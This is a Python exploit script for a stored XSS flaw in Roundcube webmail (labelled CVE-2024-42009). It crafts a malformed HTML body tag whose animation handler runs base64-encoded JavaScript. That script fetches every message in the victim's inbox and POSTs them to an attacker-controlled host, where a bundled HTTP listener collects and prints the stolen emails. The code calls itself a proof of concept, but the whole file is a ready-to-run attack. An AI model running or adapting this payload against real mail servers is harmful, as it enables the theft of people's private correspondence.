import requests
import argparse
import base64
import sys
import json
import re
from bs4 import BeautifulSoup
from http.server import BaseHTTPRequestHandler
from pwn import log, listen

class EmailFormatter:
    """Handles email formatting and display with colors and clean text"""
    
    def __init__(self):
        self.GREEN = '\033[32m'
        self.BLUE = '\033[34m'
        self.BOLD = '\033[1m'
        self.RESET = '\033[0m'
    
    def format_email_output(self, email):
        """Format and display email with colors and clean text"""
        uid = email['uid']
        content = email['content']
        
        print(f"\n{'-' * 60}")
        print(f"📧 EMAIL UID: {uid}")
        print(f"{'-' * 60}")
        
        try:
            soup = BeautifulSoup(content, 'html.parser')
            
            sender = self._extract_sender(soup)
            if sender:
                print(f"{self.GREEN}From: {sender}{self.RESET}")
            
            subject = self._extract_subject(soup)
            if subject:
                print(f"{self.BLUE}{self.BOLD}Subject: {subject}{self.RESET}")
            
            message = self._extract_message(soup)
            if message:
                print(f"\nMessage:")
                print(f"{message}")
            else:
                log.failure("No message content found")
                
        except Exception as e:
            log.failure(f"Error parsing email UID {uid}: {e}")
        
        print(f"{'-' * 60}\n")
    
    def _extract_sender(self, soup):
        try:
            element = soup.select_one('.rcmContactAddress')
            if element:
                return element.get_text(strip=True)
        except:
            pass
        
        return "Unknown Sender"
    
    def _extract_subject(self, soup):
        try:
            element = soup.select_one('.subject')
            if element:
                subject = element.get_text(strip=True)
                subject = subject.replace('Subject:', '').strip()
                if subject:
                    return subject
        except:
            pass
        
        return "No Subject"
    
    def _extract_message(self, soup):
        message_div = soup.find('div', id='messagebody')
        
        if message_div:
            message_text = message_div.get_text(separator='\n', strip=True)
            
            message_text = re.sub(r'\n\s*\n', '\n\n', message_text)
            message_text = re.sub(r'[ \t]+', ' ', message_text)
            
            return message_text.strip()
        
        return None

# I'm overwriting the do_POST and do_OPTIONS methods to properly handle cors and big request bodies
class RequestHandler(BaseHTTPRequestHandler):
    # Class variable to share shutdown event across all handler instances
    shutdown_event = None
    
    def __init__(self, *args, **kwargs):
        self.email_formatter = EmailFormatter()
        super().__init__(*args, **kwargs)
    
    def do_POST(self):
        log.info(f"POST request to: {self.path}")
        content_length = int(self.headers.get('Content-Length', 0))
        
        if content_length > 0:
            post_data = self.rfile.read(content_length).decode('utf-8')
            
            try:
                emails = json.loads(post_data)
                log.success(f"Received {len(emails)} emails!")
                
                for email in emails:
                    self.email_formatter.format_email_output(email)
                
                # Signal that we've received the payload and can shutdown
                if self.shutdown_event:
                    log.success("Email exfiltration complete! Shutting down server...")
                    self.shutdown_event.set()
                    
            except json.JSONDecodeError as e:
                log.failure(f"Failed to parse JSON data: {e}")
                log.failure(f"Raw data: {post_data[:500]}...")
            except Exception as e:
                log.failure(f"Error processing emails: {e}")
        else:
            log.failure("No data received in POST body")
        
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'POST, OPTIONS')
        self.send_header('Access-Control-Allow-Headers', 'Content-Type')
        self.end_headers()
        self.wfile.write(b'{"status": "received"}')
    
    def do_OPTIONS(self):
        # Handle CORS preflight requests
        self.send_response(200)
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'POST, OPTIONS')
        self.send_header('Access-Control-Allow-Headers', 'Content-Type')
        self.end_headers()
    
    def log_message(self, format, *args):
        # Suppress the default HTTP server logging
        pass

class XSSRoundCubeExploit:
    
    def __init__(self, target_url, lport, lhost, recipient):
        self.target_url = target_url
        self.lport = lport
        self.lhost = lhost
        self.recipient = recipient

    def _craft_payload(self):
        log.info(f"Crafting payload for {self.target_url} with recipient {self.recipient}")

        """
        NOTE: This payload sends the information as base64 encoded JSON string to the local host as I'm not looking forward to obfuscating it. If you want 
        to make it stealthier, do it yourself. This is only a PoC.
        """
        jspayload = f'(async () => {{let emails = []; let uid = 1; while (true) {{try{{const r=await fetch(`/?_task=mail&_action=show&_uid=${{uid}}&_mbox=INBOX&_extwin=1`);const t=await r.text(); if (t.includes(\'Could not load message from server.\')) {{break;}} emails.push({{uid:uid,content:t}});uid++;}}catch(e){{}}}}try {{await fetch(`http://{self.lhost}:{self.lport}/?emails=found`, {{method: "POST", headers: {{"Content-Type": "application/json"}}, body: JSON.stringify(emails)}});}} catch (e) {{console.log(e);}}}})()'

        b64_jspayload = base64.b64encode(jspayload.encode()).decode()

        payload = f'<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes ' # intentional missing quote
        payload += f'onanimationstart=eval(atob(\'{b64_jspayload}\'))'
        payload += ' foo=bar>' # foo=bar is required to avoid syntax errors when the payload is run in the browser

        return payload
    
    def _send_payload(self):
        payload = self._craft_payload()
        
        post_data = {
            "name": "XSS Bot",
            "email": "xssbot@xssbot.kali",
            "message": payload,
            "content": "html",
            "recipient": self.recipient
        }

        log.info(f"Sending payload to {self.target_url} with recipient {self.recipient}")

        requests.post(self.target_url, data=post_data, timeout=10)

    def _capture_leaked_information(self):
        log.info(f"Starting HTTP server on port {self.lport}")
        
        from http.server import HTTPServer
        import threading
        import time
        
        server_address = ('', self.lport)
        httpd = HTTPServer(server_address, RequestHandler)
        
        self.shutdown_event = threading.Event()
        RequestHandler.shutdown_event = self.shutdown_event
        
        server_thread = threading.Thread(target=httpd.serve_forever, daemon=True)
        server_thread.start()
        
        log.success(f"HTTP server listening on port {self.lport}")
        log.info("Waiting for emails... (Press Ctrl+C to stop manually)")
        
        """
        This is a hack to make the server run forever until the emails are received, however, it could not work properly and the http server might
        hang. Just manually interrupt the program if it happens.
        """
        try:
            while not self.shutdown_event.is_set():
                time.sleep(1)
            
            # Graceful shutdown after receiving emails
            log.info("Shutting down server...")
            httpd.shutdown()
            httpd.server_close()
            log.success("Server stopped successfully!")
            
        except KeyboardInterrupt:
            log.info("Manual shutdown requested...")
            httpd.shutdown()
            httpd.server_close()
            log.success("Server stopped successfully!")

    def run(self):
        self._send_payload()
        self._capture_leaked_information()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(prog="XSSRoundCubeExploit", description="XSS RoundCube Exploit (CVE-2024-42009)")
    parser.add_argument("-u", "--url", type=str, required=True, help="Target URL, e.g. http://email.company.local/contact")
    parser.add_argument("-r", "--recipient", type=str, required=True, help="Recipient email address, e.g. support@company.local")
    parser.add_argument("-l", "--lhost", type=str, required=True, help="Local host where the listener is running, e.g. 10.10.10.10")
    parser.add_argument("-p", "--lport", type=int, required=True, help="Local port where the listener is running, e.g. 4444")
    args = parser.parse_args()

    XSSRoundCubeExploit(args.url, args.lport, args.lhost, args.recipient).run()
